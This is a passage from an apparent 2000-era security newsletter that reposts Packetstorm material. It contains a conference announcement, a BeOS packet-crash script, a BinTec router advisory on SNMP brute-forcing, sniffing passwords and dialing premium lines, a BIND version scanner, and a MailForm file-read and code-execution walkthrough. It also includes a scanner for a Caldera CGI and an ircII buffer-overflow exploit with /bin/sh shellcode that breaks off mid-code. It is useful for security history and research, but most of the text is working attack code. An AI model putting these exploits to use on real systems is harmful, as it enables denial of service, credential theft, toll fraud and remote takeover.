...I know Dragos has promo'd this to death but here's the details :) April 7, 2000 CanSecWest/core00 The CanSecWest/core2000 Conference is being held May 10-12th in Vancouver, BC, Canada. Featured speakers include Ken Williams, From Ernst and Young, rain.forest.puppy from wiretrip.net and Fyodor, the author of nmap, from insecure.org. http://www.dursec.com/ CanSecWest/core00 May, 10th, 11th, 12th, 2000 Vancouver, BC, Canada. "Every IT/Security person who can attend, should attend. CanSecWest/core00 promises to be the hardest hitting, most informative, and useful network security event ever held in Canada." (Sounds familiar eh?) CanSecWest is the first in the core00 series of security tutorials. It assumes a basic understanding of computing and is targeted at IT staff and managers who require a "crash" course on advanced computer security. If you administer servers you -need- this knowledge to put yourself on an even footing with your aggressors. Our goal is to arm our attendees with the basic core set of skills to create, defend, and audit secure computer and server installations. This 2.5 day intensive training seminar will cover the most important modern security issues facing e-commerce, networking, and system administration with expert talks from some of the most noted and famous knowledgeable network security "sensei" in the world. This is your training academy for dealing with the network intruders trying to prey on your computer - maybe even right now. "Find out how they break in, how to stop them, and what they can do to try to evade you." The core00/CanSecWest conference will run on May 10-12, 2000*. The conference will be at the Robson Conference Center which is situated under the Vancouver Art Gallery next to the Law Court gardens in downtown Vancouver, BC, Canada.. The seminar will be in an auditorium setting with live highspeed internet access, and an adjoining lunch and display room. The center itself is situated in the heart of downtown Vancouver, next to major hotels, shopping, Stanley Park and several major transportation nexuses. Skiing or snowboarding at the world renown Whistler resort is a 60 minute drive from downtown. Our objective is to pack the most comprehensive overview of security into 2.5 days we can. At the conclusion of this course attendees will leave with a strong working base of critical security knowledge that can be applied to their day-to-day work immediately. "The core00" The first day of introductory training will give the attendee the background on terminology and technology to understand and effectively learn from the security masters speaking during the second day. The overall theme is similar to a martial arts school, the first day is the basics and the second is notable lectures from "Sensei". Noted speakers include: Ron Gula - Network Security Wizards Famous ex-U.S. government computer security analyst, who founded Network Security Wizards and authored the Dragon intrusion detection system. Ron will discuss intrusion detection sensors, drawing upon his large base of practical experience in the area. For personal bio please click here Ken Williams - Ernst & Young The creator of famous hacker super-site: packetstorm.securify.com. The infamous "tattooman" from genocide2600 now of Ernst&Young's security team will give some pointers on NT security. Marty Roesch - www.hiverworld.com Author of the popular "snort" intrusion detection system and senior software engineer on Hiverworld's "ARMOR" intrusion detection system. He will talk about good ways to "snort" out intruders. For personal bio please click here. rain.forest.puppy - www.wiretrip.net Famous security paper author - one of those "he could take over the internet if he felt like it" kind of guys will amaze and amuse with some 0 day exploit training. Theo DeRaadt - OpenBSD The leader of the OpenBSD Secure operating system project will talk about securing operating systems. For personal bio please click here. Fyodor - www.insecure.org Author of the award winning Nmap Security Scanner. He also maintains the popular Insecure.Org web site, the "Exploit World" vulnerability database, and several seminal papers describing techniques for stealth port scanning and OS detection via TCP/IP stack fingerprinting. Fyodor will demonstrate the use of Nmap to identify subtle security vulnerabilities in a network. For personal bio please click here. Max Vision - www.maxvision.net - - www.whitehats.com Security consultant and author of the popular ArachNIDS (www.whitehats.com) public intrusion signature database will discuss intrusion forensics, attack fakes, attacker verification, and retaliation. (I thought Max was in trouble with the law ...? - Ed) Dragos Ruiu - dursec.com Tutorial author, founder of NETSentry Technology, former MPEG and ATM expert for HP and dursec.com founder; Dragos will be giving the first day's training. Dragos has instructed tens of thousands of people about digital video and high speed computer networks in highly rated HP training courses delivered in over 60 cities world-wide. A long-time security expert and instructor, his course material will explain this intricate subject through approachable explanations with applications and real-world examples that will help you apply this important knowledge to your computers immediately. @HWA 246.0 PSS:BeOs Network DoS ~~~~~~~~~~~~~~~~~~~~ Sourced from Packetstorm http://packetstorm.securify.com/ Problem: It is possible to crash the BeOS networking process. Discussion: The BeOS networking stack crashes when certain malformed packets are sent to it. This document explains two such packets. The first is an IP packet with the protocol field set to TCP. If the IP length field is set to be shorter than 40, it will crash the networking process on reception. Similarly, an IP packet with protocol field set to UDP with an IP length of less than 28 also crashes the stack. The lengths 40 and 28 correspond with the minimum sizes of the IP and TCP headers, and the IP and UDP headers respectively. Because the networking stack is a seperate process in BeOS, it may be easily restarted after it crashes. A bug report has been filed with Be and assigned the bug number of 20000405-18674. Be has marked the bug as "Will Not Fix" with the comment "The entire networking system will be replaced soon." This bug was found with the help of the ISIC utility by Mike Frantzen. Two CASL scripts which demonstrate the bug are listed below. References: http://www.be.com/ - Be's website. BeOS is available for download free of charge. http://bebugs.be.com/devbugs/ - Be's bug tracking database. http://expert.cc.purdue.edu/~frantzen/ - The homepage of the ISIC author. ftp://ftp.nai.com/pub/security/casl/ - NAI's packet scripting language CASL is available for download free of charge. Script 1: #!/usr/local/casl/bin/casl #include "tcpip.casl" #include "packets.casl" #include "tcp.casl" srchost = 10.0.0.1; dsthost = 10.0.0.2; IPH = copy UDPIP; IPH.ip_hl = 5; IPH.ip_src = srchost; IPH.ip_dst = dsthost; IPH.ip_length = 27; packet = [ IPH ]; ip_output(packet); Script 2: #!/usr/local/casl/bin/casl #include "tcpip.casl" #include "packets.casl" #include "tcp.casl" srchost = 10.0.0.1; dsthost = 10.0.0.2; IPH = copy TCPIP; IPH.ip_hl = 5; IPH.ip_src = srchost; IPH.ip_dst = dsthost; IPH.ip_length = 39; packet = [ IPH ]; ip_output(packet); @HWA 247.0 PSS: TESO Security Advisory BinTec router weakness ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Sourced from Packetstorm http://packetstorm.securify.com/ -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------ TESO Security Advisory 2000/03/30 BinTec router security and privacy weakness Summary =================== By using SNMP brute-force-techniques for SNMP community-names one is able to gain the management accounts passwords, which are the same as the SNMP community names. Additionally the MIB-Tree holds security related information which should not be accessible through read-only/SNMP. These routers also offer services which can be abused rather easily, like dialing out and getting full line access via a CAPI interface, or a debugging interface which gives you all information which is sent over the BRI-lines. (Those services are open as default and the debugging service is barely documented) Systems Affected =================== BinTec ISDN router family tested: BIANCA/BRICK-XL BIANCA/BRICK-XS Tests =================== (1) Example system setup for examples given ___________________________________________________________________________ admin Login Password/SNMP Community bitkoenig read Login Password/SNMP Community rince write Login Password/SNMP Community guenthi defaults are: admin/bintec read/public and write/public (2) Example of Read-Only SNMP output from a BinTec router ___________________________________________________________________________ syslog: bitch:~$ snmpwalk fefe.rookie.lan rince .1.3.6.1.4.1.272.4.1.12.1 [...] enterprises.272.4.1.12.1.4.954440111.7.39 = "citykom-muenster: local IP address is 195.202.40.124, remote is 195.202.32.121" enterprises.272.4.1.12.1.4.954440116.7.40 = "LOGOUT as admin from TELNET 192.168.0.100 at Thu Mar 30 18:15:16 2000" enterprises.272.4.1.12.1.4.954440685.7.41 = "LOGIN as admin from TELNET 192.168.0.100 at Thu Mar 30 18:24:45 2000" enterprises.272.4.1.12.1.4.954440692.7.42 = "citykom-muenster: outgoing connection closed, duration 583 sec, 18194 bytes received, 4934 bytes sent, 6 charging units, 0 charging amounts" enterprises.272.4.1.12.1.4.954440692.7.43 = "ISDN: 30.03.2000,18:15:08,18:24:52,583,18596,5306,134,124,6 Units,O,, 609910,7/0,0,0B,citykom-muenster" [...] capi-user-db: bitch:~$ snmpwalk fefe.rookie.lan rince .1.3.6.1.4.1.272.4.7.8.1 enterprises.272.4.7.8.1.1.7.100.101.102.97.117.108.116.0 = "default" /* username */ enterprises.272.4.7.8.1.2.7.100.101.102.97.117.108.116.0 = "" /* password */ enterprises.272.4.7.8.1.6.7.100.101.102.97.117.108.116.0 = 1 /* capi access activated */ (3) Remote CAPI Server on a BinTec router ___________________________________________________________________________ fefe:> ps -elf [...] S 0 26 1 28 0 Jan 1 ? 00:00 00:00 vcapid [...] Corresponding Port: bitch:~# nmap -sS -O -p 6000 poor.brick.de Starting nmap V.3.01beta by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/) Interesting ports on poor.brick.de (xxx.xxx.xxx.xxx): Port State Protocol Service 6000 open tcp X11 TCP Sequence Prediction: Class=random positive increments Difficulty=1894 (Medium) Remote operating system guess: Bintec Brick XS SW Release 4.9.1 ISDN access router Nmap run completed -- 1 IP address (1 host up) scanned in 8 seconds (4) BrickTrace Server on a BinTec router: ___________________________________________________________________________ fefe:> ps -elf [...] S 0 24 1 28 0 Jan 1 ? 00:04 00:01 traced [...] Corresponding Port: bitch:~# nmap -sS -O -p 7000 poor.brick.de Starting nmap V.3.01beta by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/) Interesting ports on poor.brick.de (xxx.xxx.xxx.xxx): Port State Protocol Service 6000 open tcp afs3-fileserver TCP Sequence Prediction: Class=random positive increments Difficulty=1894 (Medium) Remote operating system guess: Bintec Brick XS SW Release 4.9.1 ISDN access router Nmap run completed -- 1 IP address (1 host up) scanned in 6 seconds (5) BrickTracing a password from an outgoing PPP connection ___________________________________________________________________________ bitch:~$ bricktrace -h2pi 1 0 2 bricktrace: Connected to 192.168.0.1(7000) Tracing: Channel 1 Unit 0 Slot 2 /* Tracing the B-Channel */ [...] 020721.320 X DATA[0025] 0000: ff 03 c0 23 01 01 00 15 08 73 68 6f 6c 74 77 69 ...#.....user 0010: 73 07 72 65 74 68 6f 6f 6f .password PPP packet protocol 0xc023 (PAP) ID 1 PAP Authenticate-Request Peer-ID user Password password A=FF UI [...] (6) Snooping an S0 Bus for telephone calls ___________________________________________________________________________ bitch:~$ bricktrace -h3 0 0 2 bricktrace: Connected to 192.168.0.1(7000) Tracing: Channel 0 Unit 0 Slot 2 /* Tracing the D-Channel */ [...] 021096.656 R DATA[0015] 0000: 02 b3 10 1a 08 01 81 0d 18 01 89 1e 02 82 88 ............... PD=08 Dest CR=01 SETUP ACKNOWLEDGE IE-Element : Channel Identification : Interface implicitly identified Interface type S0 Channelnumber is exclusive (accept only this) Identified Channel is not D-Channel Selected Channel : B1-Channel IE-Element : Progress Indicator reports In-band information now available [...] 021105.366 R DATA[0008] 0000: 02 b3 12 2e 08 01 81 02 ........ PD=08 Dest CR=01 CALL PROCEEDING 021108.076 R DATA[0012] 0000: 02 b3 14 2e 08 01 81 01 1e 02 82 88 ............ PD=08 Dest CR=01 ALERT IE-Element : Progress Indicator reports In-band information now available [...] 021124.748 R DATA[0028] 0000: 02 b3 16 2e 08 01 81 07 29 05 00 03 1e 12 23 4c ........).....#L 0010: 0b 21 83 31 33 30 31 31 32 31 31 32 .!.130112112 PD=08 Dest CR=01 CONNECT IE-Element : Date yy.mm.dd-hh:mm : 0.3.30-18:35:134597435 IE-Element : Unknown IE-Element 0x4c in Codeset 0 [...] 021130.282 R DATA[0045] 0000: 02 b3 1a 32 08 01 81 4d 1c 16 91 a1 13 02 02 c4 ...2...M........ 0010: 37 02 01 22 30 0a a1 05 30 03 02 01 00 82 01 01 7.."0...0....... 0020: 28 0b 30 20 45 69 6e 68 65 69 74 65 6e (.0 Einheiten PD=08 Dest CR=01 RELEASE IE-Element : Facility Service discriminator is supplement. application Component tag is invoke integer (0x2) 50231 integer (0x1) 34 sequence (0xa) { GetNextRequest (0x5) { sequence (0x3) { integer (0x1) 0 } } GetResponse (0x1) } IE-Element : Display : 0 Einheiten [...] (7) Checking line status from BinTec's httpd: ___________________________________________________________________________ [...] Hardware Interfaces Slot 1 Ethernet o.k. Slot 2 ISDN S2M o.k. used 13, available 17 - - X X X X X - X - - - X - X - - X - - X - - - X - - X - X [...] now we know what to sniff: sniffing an inbound ppp connection on line 4 slot 2: bitch:~$ bricktrace -h2pit 4 0 2 bricktrace: Connected to aaa.bbb.ccc.ddd(7000) Tracing: Channel 4 Unit 0 Slot 2 [...] 004419.999 X DATA[0045] 0000: 21 45 00 00 2c 39 07 40 00 3e 06 f5 cc c2 61 44 !E..,9.@.>....aD 0010: 0d c2 61 45 28 00 50 da 79 bc f8 a9 a7 02 2b c5 ..aE(.P.y.....+. 0020: 7a 60 12 44 70 3c z.Dp< Compressed PPP packet protocol 0x21 (TCP/IP) A=21 RNR P/F=0 N(R)=2 IP-Packet from aaa.bbb.ccc.ddd to a.b.c.d protocol 0x6 TCP-Message, sourceport 80 destinationport 55929 sequence number 3170412967 acknowledgement number 36423034 offset 6 flags ACK SYN window 17520 checksum 0x3c9e urgent 0 [...] 004420.640 R DATA[0609] 0000: 2d 70 0e b0 43 ff 47 45 54 20 68 74 74 70 3a 2f -p..C.GET http:/ 0010: 2f 63 68 61 74 33 2e 70 6c 61 79 67 72 6f 75 6e /chat3.playgroun 0020: 64 2e 64 65 2f 63 d.de/c Compressed PPP packet protocol 0x2d (VJ Compressed TCP/IP) A=2D I P/F=1 N(R)=3 N(S)=0 0E B0 C FF G E T h t t p : / / c h a t 3 . p l a y g r o u n d . d e / c h a t IP-Packet from a to b protocol 0x2f [...] Impact =================== (1) SNMP communities / login passwords ___________________________________________________________________________ By using standard brute-force methods, the SNMP community string, and therefore the login's passwords can be obtained. A program doing this is for example ADMsnmp, which has to be feeded by a wordlist. Bruteforcing this way is quite effective, you get about 500-1000 words per minute. (which of course depends on your and the routers connectivity) You can get this program from [4]. Bruteforcing the passwords directly via telnet isn't possible because the router slows down after approx. 6 tries. (2) Using the CAPI facility ___________________________________________________________________________ Nearly any router can remotely be used as 'ISDN-Line provider' - you can use the BRI-Lines of the router if they are not password protected. While doing a short survey most machines we encountered were proven to be vulnerable, so they didn't have any restrictions set. The CAPI daemon listens on port 6000 as you can see in the 'Tests' section. This feature can, for example be exploited by dialing expensive numbers (0900 or 0190 [in DE] lines). You may also hide your real identity by calling a 'call-by-call' ISP who gives you another IP you can deal with. A (R)CAPI library for Un*x exists, which can be used for these attacks. It is available via [5]. There is also a CAPI user interface for MS Windows, which is called Brickware and can be obtained via [6]. Firmware before 5.1.x seems to be generally not passworded, we have not checked 5.1.x yet. (3) Using BrickTrace for snooping BRI-Lines ___________________________________________________________________________ You can gain information of the ISP or corporation running these routers with open BrickTrace ports (Port 7000, default) with a program called bricktrace, which is available via [7]. In the documentation this port isn't even stated (!). See 'Solution' for how to turn off this port. As you can see the whole data passing the line, so you also get the users passwords and see what they do in the net (it is in a way like a dedicated sniffer). Using this technique of sniffing you may also see private information of corporations, not only restricting you to Internet traffic but also on 'intranet' lines that use the same router, as well as telephony networks (S0 bus). Explanation =================== BinTec Communications seems to rely on security by obscurity. Neither the severity of these services, nor how to configure them are mentioned properly in their documentation. However, BinTec routers *can* be secured, it just seems not to be common knowledge. In addition to this, it seem to be quite useless to provide RCAPI facilities on a router which is mainly used for dial-in purposes. If one needs those abilities, encrypted management access would be appropriate. Solution =================== SNMP: disable (admin.biboAdmSnmpPort=0) (admin.biboAdmSnmpTrapPort=0) RCAPI: disable or password protect (admin.biboAdmCapiTcpPort=0) BrickTrace: disable (admin.biboAdmTraceTcpPort=0) Just manage your Router through serial line, because if your connection gets sniffed, these services can be reactivated. Acknowledgments ================ The bug-discovery and the demonstration are due to Stephan Holtwisch [2] This advisory has been written by Stephan 'rookie' Holtwisch and hendy. Contact Information =================== The TESO crew can be reached by mailing to teso@coredump.cx. Our web page is at [1]. References =================== [1] TESO http://teso.scene.at/ or https://teso.scene.at/ [2] Stephan Holtwisch sholtwis@muenster.de [3] BinTec Communications http://www.bintec.de [4] ADMsnmp - bruteforce SNMP communities ftp://adm.freelsd.net/pub/ADM/ADMsnmp.0.1.tgz [5] libcapi for RCAPI (Unix) ftp://ftp.bintec.de/pub/brick/libcapi/ [6] BrickWare (CAPI software for windows) ftp://ftp.bintec.de/pub/brick/brickware/ [7] BrickTrace (BRI-Line snooping) ftp://ftp.bintec.de/pub/brick/unixtool/ Disclaimer =================== This advisory does not claim to be complete or to be usable for any purpose. Especially information on the vulnerable systems may be inaccurate or wrong. The supplied information is not to be used for malicious purposes, but for educational purposes only. This advisory is free for open distribution in unmodified form. Articles that are based on information from this advisory should include at least links [1] and [2]. - ------ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.1 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE45biacZZ+BjKdwjcRAlQaAJ9ozxk8JlFuEZSA0br4u+d3+CbfgACgjLHx fDJT2mFXDx4xRzzE7Da7pD8= =d2XM -----END PGP SIGNATURE----- @HWA 248.0 b0f: namedscan.c ~~~~~~~~~~~~~~~~ /*********************************************/ /* namedscan.c will check the named version */ /* of a host, and tell you if its a vuln version */ /***********************************************/ /* buffer0verfl0w security */ /*******************************/ /* coded by eth0 from b0f */ /* [http://www.b0f.com] */ /*******************************/ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include int lookup_host(struct sockaddr_in *ra, char *hn, unsigned short rp); void probe_bind(struct sockaddr_in ra); int talk(int sd, char *pkt, int pktl, char opc); int make_keypkt(char *pktbuf, char opc); void print_ver(char *host, int vul, char *buf); void handle_alarm(int signum); int lookup_host(ra, hn, rp) struct sockaddr_in *ra; char *hn; unsigned short rp; { struct hostent *he; ra->sin_family = AF_INET; ra->sin_port = htons(rp); if ((ra->sin_addr.s_addr = inet_addr(hn)) != -1) return 1; if ((he = gethostbyname(hn)) != (struct hostent *)NULL) { memcpy(&ra->sin_addr.s_addr, he->h_addr, 4); return 1; } herror("Unable to resolve hostname"); return 0; } void probe_bind(ra) struct sockaddr_in ra; { int sd; char iquery[512], vquery[512], rname[256]; struct hostent *he; HEADER *dh = (HEADER *)iquery; memset(vquery, 0, sizeof(vquery)); memset(iquery, 0, sizeof(iquery)); if (((sd = socket(AF_INET, SOCK_DGRAM, 0)) == -1) || (connect(sd, (struct sockaddr *)&ra, sizeof(ra)) == -1)) { perror("Unable to connect"); if (sd != -1) close(sd); return; } if ((he = gethostbyaddr((char *)&ra.sin_addr, sizeof(ra.sin_addr), AF_INET)) == (struct hostent *)NULL) sprintf(rname, "%s", inet_ntoa(ra.sin_addr)); else strncpy(rname, he->h_name, sizeof(rname)); if (!talk(sd, iquery, sizeof(iquery), IQUERY)) return; if (!talk(sd, vquery, sizeof(vquery), QUERY)) return; close(sd); /* if dh->rcode == 0, then our iquery request was answered and the remote server supports iquery */ print_ver(rname, dh->rcode == 0, vquery); } /* * write our packet from pkt, wait for a response and put it in pkt. * if the alarm goes off or the read fails, we print error * and return 0. otherwise, our response packet is in pkt and we return 1. */ int talk(sd, pkt, pktl, opc) int sd, pktl; char *pkt, opc; { int pktlen; pktlen = make_keypkt(pkt, opc); if (!write(sd, pkt, pktlen)) { perror("write failed"); close(sd); return 0; } /* #ifdef DEBUG printf("write() success\n"); #endif */ siginterrupt(SIGALRM, 1); signal(SIGALRM, handle_alarm); alarm(3); pktlen = read(sd, pkt, pktl); if (pktlen <= 0) { if (errno == EINTR) errno = ETIMEDOUT; perror("<[Namedscan]>:([ Read Failed *shrugs* ]) -> read failed"); close(sd); return 0; } /* #ifdef DEBUG printf("read success\n"); #endif */ alarm(0); return 1; } int make_keypkt(pktbuf, opc) char *pktbuf; char opc; { HEADER *dnsh; char *ptr = pktbuf; int pktlen = 0; dnsh = (HEADER *) ptr; /* fill out the parts of the DNS header that aren't 0 */ dnsh->id = htons(rand() % 65535); dnsh->opcode = opc; dnsh->rd = 1; dnsh->ra = 1; /* one answer for IQUERY, one question for QUERY */ if (opc == IQUERY) dnsh->ancount = htons(1); else if (opc == QUERY) dnsh->qdcount = htons(1); pktlen += sizeof(HEADER); ptr += sizeof(HEADER); /* we have to make a QUERY, fill out the question section */ if (opc == QUERY) { /* version.bind. == elite */ char qstr[] = "\007version\004bind\000"; int qlen = strlen(qstr) + 1; memcpy(ptr, qstr, qlen); ptr += qlen; pktlen += qlen; PUTSHORT(T_TXT, ptr); PUTSHORT(C_CHAOS, ptr); pktlen += sizeof(short) * 2; } /* add a resource record for the inverse query */ else if (opc == IQUERY) { unsigned long addr = inet_addr("1.2.3.4"); unsigned long ttl = 31337; unsigned short addrlen = 4; *(ptr++) = '\0'; pktlen++; PUTSHORT(T_A, ptr); PUTSHORT(C_IN, ptr); PUTLONG(ttl, ptr); PUTSHORT(addrlen, ptr); PUTLONG(addr, ptr); pktlen += (sizeof(short) * 3) + (sizeof(long) * 2); } /* if we're debugging, show what we just made */ /* #ifdef DEBUG print_dnspkt(pktbuf, pktbuf + pktlen); #endif */ return pktlen; } int checknamed(char *verstr) { if(strstr(verstr,"4.9.5")||strstr(verstr,"4.9.6-REL") || strstr(verstr,"4.9.5-REL")||strstr(verstr,"4.9.5-P1")||strstr(verstr, "8.1-REL") ||strstr(verstr,"8.1.1")||strstr(verstr,"8.2")||strstr(verstr,"8.2.1")) { if(strstr(verstr,"8.2.2-P5")||strstr(verstr,"8.2.2-P4")||strstr(verstr,"8.2.2-P3")||strstr(verstr,"8.2.2-P2")){printf("<[Name d Version [%s] ]>\n",verstr);return(0);} printf("<[Named version [%s]]> Possible Vuln\n",verstr); } else { printf("<[No named vulns found. version [%s]]>\n",verstr); } return(0); } void print_ver(host, vul, buf) char *host, *buf; int vul; { HEADER *dnsh = (HEADER *)buf; char *ptr, *verstr; int len; if (dnsh->rcode != 0) { /* printf("%s's named that %s iquery does not respond to version.bind.\n", host, vul ? "supports" : "errors on"); */ return; } /* So we actually have a response. Lets skip the crap, starting with the header */ ptr = (buf + sizeof(HEADER)); /* then the question section domain name. */ while (*ptr != '\0') ptr++; /* then the trailing null and the type/class of the question */ ptr += 1 + (sizeof(short) * 2); /* now we skip the answer section domain name. (should be the same as the question) */ while (*ptr != '\0') ptr++; /* don't forget the trailing null, type, class, and time to live. */ ptr += 1 + (sizeof(long) + (sizeof(short) * 2)); /* Here we are at the resource record data length, extract it */ GETSHORT(len, ptr); /* avoid the need to decompress the string (treat it as one) */ ptr++; /* allocate space for and copy the version response txt */ verstr = (char *)malloc(len); memset(verstr, 0, len); memcpy(verstr, ptr, len-1); /* run through the vesion string and replace non-printable and non-whitespace characters with a '.' */ for (ptr = verstr; ptr - verstr != len - 1; ptr++) if (!isprint(*ptr) && !isspace(*ptr)) *ptr = '.'; /* print the version and iquery support status, woo hoo */ #ifdef debugz printf("%s's named that %s iquery is version: %s\n", host, vul ? "supports" : "errors on", verstr); #endif checknamed(verstr); } /* * handle the alarm signal by resetting the alarm timer and * the signal handler for SIGALRM. This stuff probably isn't needed, * but I did it anyway. It's good for debugging, ran into some problems with * alarm() not doing its job. */ void handle_alarm(signum) int signum; { alarm(0); signal(SIGALRM, SIG_DFL); /* #ifdef DEBUG printf("recieved alarm\n"); #endif */ } int main(int argc, char *argv[]) { struct in_addr addr; struct sockaddr_in sin; struct hostent *he; int sock; struct sockaddr_in ra; if(argv[1]==NULL) { printf("coded by eth0 [b0f]\n"); printf("Usage: %s [host]\n",argv[0]); exit(1); } if ((he=gethostbyname(argv[1])) == NULL) { herror("gethostbyname"); exit(0); } if (!lookup_host(&ra, argv[1], NAMESERVER_PORT)) return; srand(time(NULL)); probe_bind(ra); return(0); } @HWA 249.0 PSS:Advisory: MailForm v1.91 for Windows 95 and NT 4.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Sourced from Packetstorm http://packetstorm.securify.com/ Advisory: MailForm v1.91 for Windows 95 and NT 4.0 Chopsui-cide[MmM] The Mad Midget Mafia - http://midgets.box.sk/ ======================================================================= Do not save this with any editor, or _vital_ formatting may be lost. Disclaimer: ============= This document is intended as an advisory, and I cannot be held accountable for its misuse. The reader assumes all responsibility for his/her use of this information. Summary: ========== Date released: 07/04/2000 (dd/mm/yyyy). Risk: denial of service, reading of private files, appending to private files, full system compromise if the afforementioned risks are leveraged properly. Vulnerability found by: Chopsui-cide Vulnerable: MailForm v1.91, probably prior versions (not tested). Immune: ? MailForm allows potentially dangerous parameters to be specified by anyone who can execute it. These allow for reading and writing of files on the system on which MailForm resides. Details: ========== Problem fields: _1_TextLog - _1_HTMLLog - these two are the ones used to write to files. _1_MailTemplate - this is what is used to retrieve files. _1_INIFile - possibly dangerous, but not discussed here. _1_MailServer - we can just change this to our own address. _1_MailTo - we don't even need to bother with this. It's fairly obvious where the problem lies here. We can specify any file to send + the POP server to send it to. The con\con bug may also be used to bring down the entire system. Template files will be cut off at the first null character, so retrieving of binaries is not practical. Trying to retrieve certain files will cause MailForm to crash. A very crude example of how to run code on the remote system is provided in the last section of this advisory. Implementation: web interface =============================== I have constructed some html that allows an attacker to download and append to files on any remote system running MailForm (cut where it says [snip], obviously): [snip] Web interface for MailForm vulnerabilities. Do not be alarmed by any "Form submission failed" errors. These are normal. You will need to modify the form tags in this page to correspond to the host being attacked.

Download file:



Append to file:
Note: your text will be preceeded by garbage.


The Mad Midget Mafia
[snip] The e-mail will be sent to the host you specify on port 25. It should be easy enough to capture using netcat. Implementation: full compromise ================================= When appending text to files, the following kind of ugly crap preceeds it: [snip] Submitted at Thu Apr 06 22:14:49 2000 from 192.168.1.1 Name: [snip] Even with this handicap, we can still modify/create batch files. This is how we will execute code. The idea here is to create a kind of "script" for debug that will assemble and execute a small program. It is basically just a list of keystrokes. We then add an entry to autoexec.bat that executes it. Fist we need to upload the following file to c:\windows\script.txt [snip] a 100 mov dx,10b mov ah,09 int 21 mov ah,4c int 21 db "Code has been executed.",0d,0a,"$" g=100 q [snip] Make sure at the end of each line there is _no_ carriage return. Each line should be terminated by \x0a (linefeed). Get rid of the carriage returns (\x0d), ie: a 100 mov dx,10b mov ah,09 int 21 mov ah,4c int 21 db "Code has been executed.",0d,0a,"$" g=100 q Add a newline (\x0d,\x0a) before the above, and submit the two lines using the web-based interface. Add the following line to any batch file that is executed upon start-up (ie, autoexec.bat): debug < c:\windows\script.txt Check that everything is in order by trying to download both script.txt and the batch file you modified. Force a reboot using the con\con vulnerability. Once it restarts, the code will be executed. I know this is a really ugly hack, but it works (poor excuse). Also, make sure the garbage doesn't interfere with anything (always put a newline before the start of your commands). ======================================================================= @HWA 250.0 PSS: CGI rmp_query scanner ~~~~~~~~~~~~~~~~~~~~~~~~~~ /* rmp_query : /cgi-bin/rmp_query server scanning program. Scanner by Alhambra (slightly modified) A vulnerability exists in the default installation of Caldera OpenLinux 2.3. A CGI is installed in /home/httpd/cgi-bin/ names rpm_query. Any user can run this CGI and obtain a listing of the packages, and versions of packages, installed on this system. This could be used to determine vulnerabilities on the machine remotely. Usage: rmp_query */ #include #include #include #include #include #include #include #include #include #ifdef LINUX #include #endif #include #include #include #include #include #include int FLAG = 1; int Call(int signo) { FLAG = 0; } main (int argc, char *argv[]) { char host[100], buffer[1024], hosta[1024],FileBuf[8097]; int outsocket, serv_len, len,X,c,outfd; struct hostent *nametocheck; struct sockaddr_in serv_addr; struct in_addr outgoing; char rmpMessage[]="GET /cgi-bin/rmp_query\n"; while(fgets(hosta,100,stdin)) { if(hosta[0] == '\0') break; hosta[strlen(hosta) -1] = '\0'; write(1,hosta,strlen(hosta)*sizeof(char)); write(1,"\n",sizeof(char)); outsocket = socket (AF_INET, SOCK_STREAM, 0); memset (&serv_addr, 0, sizeof (serv_addr)); serv_addr.sin_family = AF_INET; nametocheck = gethostbyname (hosta); (void *) memcpy (&outgoing.s_addr, nametocheck->h_addr_list[0], sizeof(outgoing.s_addr)); strcpy (host, inet_ntoa (outgoing)); serv_addr.sin_addr.s_addr = inet_addr (host); serv_addr.sin_port = htons (80); signal(SIGALRM,Call); FLAG = 1; alarm(10); X=connect (outsocket, (struct sockaddr *) &serv_addr, sizeof (serv_addr)); alarm(0); if(FLAG == 1 && X==0){ write(outsocket,rmpMessage,strlen(rmpMessage)*sizeof(char)); while((X=read(outsocket,FileBuf,8096))!=0) write(1,FileBuf,X); } close (outsocket); } return 0; } @HWA 251.0 PSS:New ircii exploit ~~~~~~~~~~~~~~~~~~~~~ /* ircii-4.4 exploit by bladi & aLmUDeNa buffer overflow in ircii dcc chat's allow to excute arbitrary Affected: ircII-4.4 Patch: Upgrade to ircII-4.4M ftp://ircftp.au.eterna.com.au/pub/ircII/ircii-4.4M.tar.gz Offset: SuSe 6.x :0xbfffe3ff RedHat :0xbfffe888 Thanks to : #warinhell,#hacker_novatos Special thanks go to: Topo[lb], Saludos para todos los que nos conozcan especialmente para eva ;) (bladi@euskalnet.net) */ #include #include #include #include #include #include #include #include char *h_to_ip(char *hostname); char *h_to_ip(char *hostname) { struct hostent *hozt; struct sockaddr_in tmp; struct in_addr in; if ((hozt=gethostbyname(hostname))==NULL) { printf(" ERROR: IP incorrecta\n"); exit(0); } memcpy((caddr_t)&tmp.sin_addr.s_addr, hozt->h_addr, hozt->h_length); memcpy(&in,&tmp.sin_addr.s_addr,4); return(inet_ntoa(in)); } main(int argc, char *argv[]) { struct sockaddr_in sin; char *hostname; char nops[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"; char *shell = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; int outsocket,tnt,i; printf (" irciismash ver: 1.0\n"); printf (" by \n"); printf (" bladi & aLmUDeNa\n\n"); if (argc<3) { printf("Usage : %s hostname port\n",argv[0]); exit(-1); } hostname=argv[1]; outsocket=socket(AF_INET,SOCK_STREAM,0); sin.sin_family=AF_INET; sin.sin_port=htons(atoi(argv[2])); sin.sin_addr.s_addr=inet_addr(h_to_ip(hostname)); if (connect (outsocket, (struct sockaddr *) &sin, sizeof(sin)) == -1) { printf(" ERROR: El puerto esta cerradito :_(\n"); exit(0); } printf("[1]- Noping\n ["); for(i=0;i<47;i++) { if(!(i % 7)) { usleep (9); printf("."); fflush(stdout); } write(outsocket,nops,strlen(nops)); } printf("]\n"); printf(" Noped\n"); printf("[2]- Injectin shellcode\n"); write(outsocket,shell,strlen(shell)); usleep(999); printf(" Injected\n"); printf("[3]- Waiting\n ["); 